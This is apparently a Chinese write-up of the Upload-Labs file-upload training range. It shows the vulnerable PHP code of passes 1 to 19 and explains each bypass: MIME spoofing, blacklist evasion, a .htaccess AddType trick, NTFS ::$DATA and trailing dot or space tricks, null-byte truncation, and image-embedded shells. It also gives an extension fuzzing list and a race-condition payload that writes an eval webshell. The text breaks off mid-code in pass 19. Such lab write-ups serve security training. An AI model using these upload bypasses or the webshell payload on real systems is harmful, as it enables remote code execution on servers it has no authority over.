【封神台】Upload-Labs wp
发表于: 2021-8-5 13:45 1700
前言
- 掌控安全里面的靶场upload-labs,练练手!
- 环境:http://59.63.200.79:8016/
pass-01
// Pass-01: the only check is this browser-side JavaScript. Nothing here reaches the
// server, so it is bypassed by disabling JS or by renaming the file in an intercepted
// request after the form has been submitted.
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    // Allowed upload extensions (client-side list only)
    var allow_ext = ".jpg|.png|.gif";
    // Extract the extension from the last "." onwards
    var ext_name = file.substring(file.lastIndexOf("."));
    // Membership test by substring search. NOTE: ".gif|" can never be found because
    // allow_ext has no trailing "|", so this check rejects .gif even though it is meant
    // to be allowed.
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}
- 这一关的校验只在浏览器端的 JavaScript 里完成(上面的 checkFile),服务端没有任何检查。先把木马改名为 .jpg 通过前端检查,用 Burp 抓包后再把文件名改回 .php 即可;或者直接禁用 JS 上传。需要注意的是图片马多生成几个试试,有的图片不太行。
pass-02
// Pass-02: server-side check on MIME type only.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        // $_FILES[...]['type'] is the Content-Type the client sent with the multipart
        // part; PHP does not verify it, so it is attacker-controlled.
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            // The original client-supplied filename (and therefore its extension) is
            // used unchanged as the destination.
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                // Note: no '/' separator here, unlike the move_uploaded_file() path above.
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR.'文件夹不存在,请手工创建!';
    }
}
- 服务端只比对了 $_FILES['upload_file']['type'],这个值就是请求里的 Content-Type,完全由客户端决定;后缀没有任何限制。直接上传 .php,抓包把 Content-Type 改成 image/jpeg 即可,其余做法和上一题一样。
pass-03
// Pass-03: extension blacklist with only four entries.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        // Blacklist: anything not listed here (.phtml, .php3, .php5, ...) passes.
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//strip trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            // The normalised extension is only used for the check; the file is saved
            // under the raw client-supplied name.
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR.'/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 黑名单只过滤了 .asp/.aspx/.php/.jsp 四个后缀,可以用其它后缀试试:phtml、php3、php5、php.a、shtml 等。注意这些后缀能否被当作 PHP 执行取决于服务端的 handler 配置(例如 Apache 是否用 AddType/AddHandler 把它们交给了 PHP),上传后要实际访问确认;如果目标是 asp 环境,则可以试 cer、asa、cdx 等。
pass-04
// Pass-04: long, case-variant blacklist that still omits .htaccess.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        // NOTE: "php1" and "pHp1" lack the leading dot, so they can never equal the
        // strrchr() result (which always starts with "."). ".htaccess" is absent.
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//strip trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            // Saved under the raw client-supplied name, not the normalised one.
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                // Note: no '/' separator here, unlike the move_uploaded_file() path above.
                $img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 基本上都过滤了,用.htaccess文件绕过吧
- 这是 Apache 特有的方式:.htaccess 只对 Apache 有效,而且前提是该目录的 AllowOverride 允许覆盖 FileInfo(或 All),否则文件会被忽略。
- .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。
- 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
- 这个漏洞的原理是服务端没有把 .htaccess 列进黑名单(对比下一关的 deny_ext 可以看到第 5 关才加上),上传后 Apache 会按这个文件里的指令处理当前目录及其子目录。下面这一行让 .png 后缀的文件也交给 PHP 解析,之后再上传一个 .png 的图片马访问即可执行:
# Uploaded as ".htaccess" (pass-04 does not blacklist it). Apache applies it to this
# directory and its subdirectories when AllowOverride permits FileInfo; from then on
# every ".png" in the directory is handed to the PHP handler.
AddType application/x-httpd-php .png
pass-05
// Pass-05: .htaccess added to the blacklist, but the strtolower() step is gone.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//strip trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        // No strtolower() here, so in_array() below is a case-sensitive comparison:
        // a case variant not in the list (e.g. ".PhP") is not matched.
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 黑名单加上了 .htaccess,但和上一关对比可以发现少了 strtolower(),in_array() 的比较因此区分大小写,只要用列表里没有的大小写组合(如 .PhP)就能绕过。能否执行取决于服务器匹配后缀时是否区分大小写(Windows 下一般不区分)。下面是一份可以拿来 fuzz 后缀的字典:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 | phtml php php3 php4 php5 inc pHtml pHp pHp3 pHp4 pHp5 iNc iNc % 00 iNc % 20 % 20 % 20 iNc % 20 % 20 % 20. .. % 20. % 20. . iNc...... inc % 00 inc % 20 % 20 % 20 inc % 20 % 20 % 20. .. % 20. % 20. . inc...... pHp % 00 pHp % 20 % 20 % 20 pHp % 20 % 20 % 20. .. % 20. % 20. . pHp...... pHp3 % 00 pHp3 % 20 % 20 % 20 pHp3 % 20 % 20 % 20. .. % 20. % 20. . pHp3...... pHp4 % 00 pHp4 % 20 % 20 % 20 pHp4 % 20 % 20 % 20. .. % 20. % 20. . pHp4...... pHp5 % 00 pHp5 % 20 % 20 % 20 pHp5 % 20 % 20 % 20. .. % 20. % 20. . pHp5...... pHtml % 00 pHtml % 20 % 20 % 20 pHtml % 20 % 20 % 20. .. % 20. % 20. . pHtml...... php % 00 php % 20 % 20 % 20 php % 20 % 20 % 20. .. % 20. % 20. . php...... php3 % 00 php3 % 20 % 20 % 20 php3 % 20 % 20 % 20. .. % 20. % 20. . php3...... php4 % 00 php4 % 20 % 20 % 20 php4 % 20 % 20 % 20. .. % 20. % 20. . php4...... php5 % 00 php5 % 20 % 20 % 20 php5 % 20 % 20 % 20. .. % 20. % 20. . php5...... phtml % 00 phtml % 20 % 20 % 20 phtml % 20 % 20 % 20. .. % 20. % 20. . phtml...... |
pass-06
// Pass-06: both trim() calls are gone, so trailing whitespace survives.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        // No trim() on the name: "shell.php " keeps its trailing space.
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//strip trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        // No trim() on the extension either, so ".php " is compared as-is and is not
        // in the blacklist.
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 这一关的黑名单比较全面,但去掉了两处 trim(),文件名末尾的空格不会被删掉,取到的后缀是 ".php "(带空格),不在黑名单里。Windows 在创建文件时会自动丢掉末尾的空格,所以落地文件名仍是 .php;这个绕过在 Linux 下不成立。提示也说了空格绕过。
pass-07
// Pass-07: trim() is back, but deldot() is missing, so a trailing dot survives.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        // No deldot() here: for "shell.php." strrchr() returns "." which is not in
        // the blacklist.
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 这一关恢复了 trim(),但去掉了 deldot(),提示说的是文件后缀点绕过:在 .php 后面再加一个点(shell.php.),strrchr() 取到的后缀变成 ".",黑名单匹配不到;Windows 保存文件时会把末尾的点去掉,落地仍是 .php。同样只在 Windows 下有效。
pass-08
// Pass-08: the str_ireplace('::$DATA', ...) step is missing.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//strip trailing dots from the filename
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        // The ::$DATA suffix is not stripped here, so "shell.php::$DATA" is compared
        // as ".php::$data", which is not in the blacklist.
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 和前面的代码相比少了 str_ireplace('::$DATA', ...),可以用 NTFS 备用数据流(Alternate Data Stream)绕过:文件名写成 shell.php::$DATA,黑名单比对的后缀是 .php::$DATA,不在列表里;Windows 写文件时把 ::$DATA 当作默认数据流名处理,实际落地的就是 shell.php。只适用于 Windows/NTFS。
- 访问执行时 URL 里不带 ::$DATA 即可。
pass-09
// Pass-09: every normalisation step is present, but each runs exactly once in a
// fixed order, so a suffix like ".php. ." survives the combination.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//strip trailing dots from the filename
        // For "shell.php. ." deldot() leaves "shell.php. ", strrchr() yields ". ",
        // and the final trim() reduces it to "." -- not blacklisted.
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //lowercase the extension
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//remove the NTFS stream suffix ::$DATA
        $file_ext = trim($file_ext); //trim leading/trailing whitespace
        if (!in_array($file_ext, $deny_ext)) {
            // The raw client name (still "shell.php. .") is what gets written.
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
                $img_path = $UPLOAD_ADDR . '/' . $file_name;
                $is_upload = true;
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 黑名单机制 + 删除文件名末尾的点 + 首尾去空,但每个处理只做一次而且顺序固定,可以按代码反向构造后缀 ".php. ."(点、空格、点)绕过。
- 处理过程:deldot() 删掉最后的点后得到 "shell.php. "(带空格),strrchr() 取到的后缀是 ". ",trim() 之后只剩 ".",不在黑名单里;而 move_uploaded_file() 用的是未处理的原始文件名,Windows 落地时会自动去掉末尾的点和空格,最终保存为 shell.php。
pass-10
// Pass-10: blacklisted substrings are deleted from the filename instead of the
// upload being rejected.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        // Single, non-recursive pass: removing "php" from "shell.pphphp" leaves
        // "shell.php", and the result is never re-checked.
        $file_name = str_ireplace($deny_ext,"", $file_name);
        // No further validation; the post-replacement name is written directly.
        if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $file_name)) {
            $img_path = $UPLOAD_ADDR . '/' .$file_name;
            $is_upload = true;
        }
    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}
- 解析:str_ireplace() 对黑名单里的每一项只做一遍、不递归的替换,删掉匹配内容后剩下的字符会重新拼起来,也不会再检查一次。所以用双写后缀 .pphphp:中间的 php 被删掉后又拼回 .php,即可绕过。这一关没有任何其它校验,替换后的文件名被直接用作保存路径。
pass-11
// Pass-11: extension whitelist plus a randomised filename, but the destination
// directory comes from the query string.
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        // $_GET['save_path'] is prepended unsanitised. A null byte in it
        // (save_path=../upload/shell.php%00) ends the path at the C level on PHP
        // builds that still accept it, dropping the random suffix and ".jpg".
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传失败!';
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}
- 文件名被随机化,后缀也走白名单,但保存目录 save_path 直接从 GET 参数取并拼到路径前面,提示用 %00 截断:save_path=../upload/shell.php%00,路径在 shell.php 处被截断,后面的随机名和 .jpg 被丢掉。注意这依赖 PHP < 5.3.4(之后版本路径里的空字节会被拒绝),并且 magic_quotes_gpc 需要关闭。下一关(pass-12)逻辑完全相同,只是 save_path 改为 POST 参数;POST 正文不会做 URL 解码,所以要在 Burp 的 Hex 视图里直接写入 0x00,而不是 %00。
pass-12
// Pass-12: identical to pass-11 except save_path is read from the POST body.
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        // $_POST['save_path'] is prepended unsanitised. The same null-byte
        // truncation as pass-11 applies, but the byte must be sent raw (0x00) in the
        // multipart body since POST fields are not URL-decoded.
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}
pass-13
// Pass-13: content check on the first two bytes only ("magic number" check).
//
// Returns 'jpg', 'png', 'gif' or 'unknown' based on the leading two bytes of
// $filename. The bytes are concatenated as decimal strings (FF D8 -> "255216",
// 89 50 -> "13780", 47 49 -> "7173"); nothing after byte 2 is inspected.
function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //read only the first 2 bytes
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
    $fileType = '';
    switch($typeCode){
        case 255216:
            $fileType = 'jpg';
            break;
        case 13780:
            $fileType = 'png';
            break;
        case 7173:
            $fileType = 'gif';
            break;
        default:
            $fileType = 'unknown';
    }
    return $fileType;
}

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);
    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        // The saved extension is the detected type, never the client name, so an
        // embedded payload only runs if something else (a parsing quirk or an
        // include) executes the image.
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    }
}
- getReailFileType() 只读取文件前两个字节,按十进制拼起来和 JPEG(FF D8)、PNG(89 50)、GIF(47 49)的文件头比对,所以任何以这几个字节开头的文件都能通过,直接上传图片马即可。但保存时后缀由检测结果决定(.jpg/.png/.gif),文件本身不会被当作 PHP 执行,还要配合解析漏洞或文件包含才能利用。有的图片不行就多换几张试试。
pass-14
// Pass-14: image check via getimagesize(), which parses the header only.
//
// Returns the extension string (with leading dot) for a recognised image, or
// false. NOTE: stripos() returns 0 for ".jpeg" because it sits at position 0 of
// $types, and 0 is falsy, so genuine JPEGs are rejected by this check.
function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        // $res already carries the dot, hence no "." separator here. As in pass-13 the
        // file is renamed to the detected image type.
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    }
}
- 只是换成 getimagesize() 来判断图片类型,它只解析图片头部,不会检查文件尾部的数据,在正常图片后面追加 PHP 代码即可通过。和上一关一样文件会按检测结果重命名,仍然要依赖解析漏洞(如 nginx)或文件包含来执行。
pass-15
// Pass-15: image check via exif_imagetype() (requires the php_exif extension).
//
// Returns "gif", "jpg" or "png" for a recognised signature, otherwise false.
// Only the type signature at the start of the file is consulted.
function isImage($filename){
    //requires the php_exif module
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        // File is renamed to the detected type; see pass-13/14.
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    }
}
- 换成了 exif_imagetype(),同样只看文件头的类型签名,不影响传图片马;执行仍然要靠解析漏洞或文件包含。
pass-16
// Pass-16: extension + MIME check, then the image is re-encoded with GD
// ("second render") so most non-image bytes of the original are discarded.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // Basic upload info: name, type, size, temp path
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];
    // Note: no '/' between $UPLOAD_ADDR and the basename here.
    $target_path = $UPLOAD_ADDR.basename($filename);
    // Extension of the uploaded file
    $fileext = substr(strrchr($filename,"."),1);
    // Only proceed when extension and client MIME type agree
    if(($fileext == "jpg") && ($filetype == "image/jpeg")){
        // The original bytes are written to disk first, under the client's basename.
        if(move_uploaded_file($tmpname,$target_path)) {
            // Build a new image from the uploaded one
            $im = imagecreatefromjpeg($target_path);
            if($im == false){
                // NOTE: $target_path is not unlinked on this branch, so the rejected
                // file appears to stay on disk.
                $msg = "该文件不是jpg格式的图片!";
            }else{
                // Name the new image. srand(time()) + rand() makes the name
                // predictable from the upload time.
                srand(time());
                $newfilename = strval(rand()).".jpg";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagejpeg($im,$newimagepath);
                // Serve the re-rendered image generated from the user's upload
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传失败!";
        }
    }else if(($fileext == "png") && ($filetype == "image/png")){
        if(move_uploaded_file($tmpname,$target_path)) {
            // Build a new image from the uploaded one
            $im = imagecreatefrompng($target_path);
            if($im == false){
                $msg = "该文件不是png格式的图片!";
            }else{
                // Name the new image
                srand(time());
                $newfilename = strval(rand()).".png";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagepng($im,$newimagepath);
                // Serve the re-rendered image generated from the user's upload
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传失败!";
        }
    }else if(($fileext == "gif") && ($filetype == "image/gif")){
        if(move_uploaded_file($tmpname,$target_path)) {
            // Build a new image from the uploaded one
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
            }else{
                // Name the new image
                srand(time());
                $newfilename = strval(rand()).".gif";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagegif($im,$newimagepath);
                // Serve the re-rendered image generated from the user's upload
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传失败!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}
- 这一关用 GD 对图片做二次渲染(imagecreatefrom* 读入后再用 image* 重新写出),原文件里大部分非图像数据会被丢弃。做法是先上传一张正常图片,把渲染后的文件和原图做二进制对比,找出没有被改动的区域,再把一句话木马放进这些位置重新上传。经验上 GIF 最容易成功;PNG/JPEG 需要把代码构造进渲染后仍保留的数据块里,比较费事。
pass-17和pass-18条件竞争
// Pass-17/18: the file is written to the web root BEFORE the extension is
// checked, and only deleted afterwards -- a time-of-check/time-of-use race.
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = $UPLOAD_ADDR . '/' . $file_name;
    // Step 1: save under the raw client name (e.g. shell.php) -- it is reachable
    // from this point on.
    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
            $img_path = $UPLOAD_ADDR . '/' . rand(10, 99).date("YmdHis").".".$file_ext;
            rename($upload_file, $img_path);
            $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            // Step 2: reject and delete. Any request that hits $upload_file between
            // step 1 and here executes it.
            unlink($upload_file);
        }
    }else{
        $msg = '上传失败!';
    }
}
- 代码先 move_uploaded_file() 把文件放到可访问目录,之后才检查后缀,不合法的再 unlink() 删除。在 move 和 unlink 之间有一个时间窗口:一边反复上传下面这个 PHP 文件,一边并发地请求它,只要在被删除前命中一次,它就会在当前目录写出一个持久的 shell.php。
<?php
// Race-window payload for pass-17/18: when this file is requested before
// unlink() removes it, it drops a persistent shell.php next to itself, so a
// single successful hit is enough.
file_put_contents('shell.php', '<?php eval($_REQUEST[2]);?>') ?>
pass-19
// Pass-19: the saved filename is taken verbatim from a POST field and only
// its pathinfo() extension is blacklisted.
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        // Fully user-controlled save name; nothing strips directory separators or
        // normalises case.
        $file_name = $_POST['save_name'];
        // pathinfo() sees only the last extension: "x.php.xxx" -> "xxx",
        // "x.php/." -> "" ; in_array() is case-sensitive so "PHP" is not matched.
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
        if(!in_array($file_ext,$deny_ext)) {
            $img_path = $UPLOAD_ADDR . '/' .$file_name;
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传失败!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }
    } else {
